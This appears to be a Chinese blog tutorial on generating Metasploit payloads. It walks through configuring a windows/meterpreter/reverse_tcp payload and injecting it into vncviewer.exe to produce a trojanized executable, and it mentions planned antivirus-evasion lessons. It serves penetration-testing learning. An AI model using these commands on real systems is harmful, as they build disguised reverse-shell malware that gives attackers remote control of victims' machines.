Metasploit Framework —— Payload

最新推荐文章于 2024-02-29 16:28:30 发布
最新推荐文章于 2024-02-29 16:28:30 发布
阅读量306 收藏
点赞数
分类专栏: Metasploit Framework
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107232472
版权

这里也是直接以练习为主,学习如何使用 payload:
!!!
附:在 exploit 的使用中,大部分时候是需要结合 payload 的,payload 也可以单独拿出来,生成 shellcode,这一节主要说的是生成 shellcode
!!!
这里我起初用的 payload 是 payload/windows/x64/meterpreter/reverse_tcp ,但是后面生成的 payload 无效果,所以我这里换了一个 payload payload/windows/meterpreter/reverse_tcp,图我就不换了,原理是一样的

就以 windows 反弹 shell 为例:
搜索:search payload/windows/meterpreter/reverse_tcp
3331d032d605b7f9aca7fbdb94887c9.png

使用:use payload/windows/meterpreter/reverse_tcp
b32d24bac71d719a87cdd7fb0ac2d0e.png

有无需要配置的地方:show options
04adee39acee01087d94259dfa38e83.png

配置:set LHOST 192.168.67.221
[这里的 IP 为 kali IP]
bba11668d713863598f4f5a4ca87c34.png

生成该 shellcode 的时候我们可以查看一下帮助:
43663a0ec9fc98f52651217a8d3bf7a.png

其中最常用的有:
!!!

-i:对其进行编码的次数
-f:输出格式[如:exe,py,c,bash,java等]
-x: 指定模板[如:以 putty 为模板]
-k: 保留模板行为并将 payload 作为新线程注入
-o:输出到…

在这里生成一个以 vncviewer.exe 为模板,对其进行两次编码,且作为新线程注入到模板当中,输出格式为 exe 格式,输出到 /root/ 目录下并命名为 vnc.exe
generate -x /usr/share/windows-resources/binaries/vncviewer.exe -i 2 -k -f exe -o /root/vnc.exe
22a69391c2b1b1d102e8791e0d6918e.png

把生成的 exe 文件拉到 win10 看看:
0ca83f975c67d6007762ab5338a6631.png

好的,立马被查杀,关于免杀这块会有专门的讲解,就到先这里啦~

😄

CrAcKeR-1
关注
专栏目录
Metasploit 载荷(Payloads)使用详解
悦分享
11-23 532
payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称为shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1296
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4591
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
Metasploit总结】之【payload
AA8j的博客
12-12 1270
payload 发现漏洞后,如何选择payload。 典型payload 使用exploit msf6 > use exploit/windows/smb/ms08_067_netapi 查看当前漏洞可利用payload msf6 exploit(windows/smb/ms08_067_netapi) > show payloads 查看payload信息 msf6 exploit(windows/smb/ms08_067_netapi) > info windows/s
metasploit payload模块介绍
星落的博客
05-19 1万+
generate命令介绍 -b 过滤坏字符 '\x00,\xff' -e 指定将要使用的加密技术(show encoder查看加密模块) -f 指定输出文件格式 -h 查看帮助信息 -i 设置加密payload的次数 -k 提高速度 -x 指定自定义可执行文件作为模板 -o 设置输出文件名称 实例演示-生成木马 1.查看metasploit集成的payload show payload 2.使用反弹的payload use payload windows/shell...
Kali linux 学习笔记(九十二)metasploit framework——payload 2020.4.25
闵行小鱼塘
04-27 774
使用exploit是为了将payload在目标机上执行
Kali linux 学习笔记(八十九)metasploit framework——简介 2020.4.23
闵行小鱼塘
04-23 1176
本节开始学习msf相关知识
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 870
本节学习客户端渗透
Kali linux 学习笔记(九十四)metasploit framework——信息收集 2020.4.26
闵行小鱼塘
04-27 594
本节学习用msf信息收集,手段非常丰富
Kali linux 学习笔记(九十三)metasploit framework——metepreter 2020.4.25
闵行小鱼塘
04-27 545
本节学习metepreter
Payload_Dumber_x64.rar
06-15
Payload_Dumber_x64.rar
Payload_Dumber_x64.7z
10-14
一加刷机包payload.bin解包工具
深入理解metasploitpayload
蚁景网安学院
04-03 685
Metasploit- Payload简单来说,Payload是黑客用来与被黑了的系统交互的简单脚本。使用payload,可以将数据传输到已经沦陷的系统。Metasploit有效载荷可以...
Metasploit的使用 - payloads
lendq的Blog
05-01 1072
payload—攻击载荷 用来建立 destination 与 host 稳定连接,可返回shell,也可以进行程序注入等。 类型: singles:独立载荷,可直接植入目标系统并执行相应的程序 相当于 结合 下面2和3的,但是执行代码是固定的,不灵活,也不建立任何连接 如:shell_bind_tcp这个payload stagers:传输器载荷,用于目标机与攻击机之...
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4842
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
dzqxwzoe的博客
02-29 1546
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
payload模块使用(四)
weixin_43047908的博客
03-20 2468
介绍几种常见的payload,并且以漏洞利用的角度探讨它们的功能 bind shell   bind(绑定型)shell用于提供远程shell连接。在成功利用了目标主机上的安全漏洞后,并且成功执行了shellcode程序以后,渗透人员可在目标主机上的特定端口上运行bind shell,以让其他主机继续控制这台主机。攻击人员可以使用基于TCP连接的标准输入输出隧道工具(例如Netcat)连接带被攻破的主机,通过bind shell继续实施控制。它的应用场合与Telnet服务器/客户端十分相似,主要适用于以NA
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3900
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
1.1 Metasploit 工具简介
热门推荐
CSDN
06-30 1万+
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值